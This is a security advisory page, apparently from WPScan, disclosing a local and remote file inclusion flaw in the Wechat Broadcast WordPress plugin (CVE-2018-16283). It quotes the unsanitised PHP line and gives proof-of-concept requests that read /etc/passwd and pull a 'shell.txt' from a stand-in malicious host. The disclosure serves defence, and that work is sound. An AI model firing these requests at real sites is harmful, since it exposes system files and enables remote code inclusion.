Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion



Description
This bug was found in the file:

/wechat-broadcast/wechat/Image.php

echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');

The parameter "url" it is not sanitized allowing include local or remote
files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
Proof of Concept
Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=
http://malicious.url/shell.txt

Affects Plugin

References

CVE 2018-16283
EXPLOITDB 45438
URL https://seclists.org/fulldisclosure/2018/Sep/32

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Original Researcher Manuel García Cárdenas
Submitter Jonas Lejon
Submitter Website https://wpscans.com
Submitter Twitter @wpscans
Views 1815
Verified No
WPVDB ID 9132

Timeline

Publicly Published 2018-09-19 (about 1 month ago)
Added 2018-09-24 (27 days ago)
Last Updated 2018-09-24 (27 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.